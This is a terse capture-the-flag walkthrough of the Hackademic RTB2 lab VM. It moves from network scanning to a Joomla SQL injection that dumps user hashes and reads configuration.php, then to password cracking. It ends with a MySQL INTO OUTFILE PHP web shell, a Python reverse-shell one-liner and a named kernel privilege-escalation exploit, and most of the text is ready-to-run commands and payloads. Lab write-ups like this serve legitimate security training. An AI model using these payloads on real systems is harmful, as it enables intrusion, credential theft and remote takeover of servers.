Hackademic RTB2


  • Netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • Joomscan
  • Metasploit


Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

looks like port 80 is opening and port 666 is filtered.

Use both wfuzz to scan the host

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

find phpmyadmin

check the webpage, and need to login, try to use sqli to by pass the autherication, but doesn’t work. Now step back, enumerate more.

I use nmap to scan the target again. find port 666 now is opening. So there may be a port knocking existing.

use wfuzz scan again

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

check the webpage

looks like it is joomla

now use Joomba to scan the app

joomscan -u

nothing cool comes out.

use metasploit

search joomla

I use auxiliary/scanner/http/joomla_plugins

msf > use auxiliary/scanner/http/joomla_plugins
msf auxiliary(joomla_plugins) > set rhosts
msf auxiliary(joomla_plugins) > set rport 666
msf auxiliary(joomla_plugins) > run

use /index.php?option=com_abc&view=abc&letter=AS&sectionid='

so first step, verify the sql injection:'

then try to get column number: order by 1-- order by 2-- order by 3--

the column number is 2

next find out which column we can use

158:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1 union all select 1,2--

Okay. Column 2

try to check mysql version union all select 1,@@version--

get all table name union all select 1, table_name from information_schema.tables--

get all column name of table jos_users union all select 1, column_name from information_schema.columns where table_name = 'jos_users'--

next, get column username and password: union all select 1, concat(username,0x20,password) from jos_users--

The format is hash:salt

use my previous joomla hash crack script crackjoomla.py

./crackjoomla.py 992396d7fc19fd76393f359cb294e300 70NFLkBrApLamH9VNGjlViJLlJsB60KF /usr/share/wordlists/rockyou.txt 

for administrator, I didn’t get the password

for JSmith, password is matrix, for BTallor, password is victim.

login using JSmith, find nowhere can upload the webshell. check the configuration.php file union all select 1, load_file('/var/www/configuration.php')--

find the username/password. Use it login phpmyadmin

now I will create a backdoor using mysql:

create database pwn;
create table backdoor(script text);
insert into backdoor(script) values('<?php echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; ?>');
select * into outfile "/var/www/backdoor3.php" from backdoor;

check the backdoor. -a


Setup netcat and

1 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

uname -a

find the kernel version is 2.6.32. Find an exploit Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation.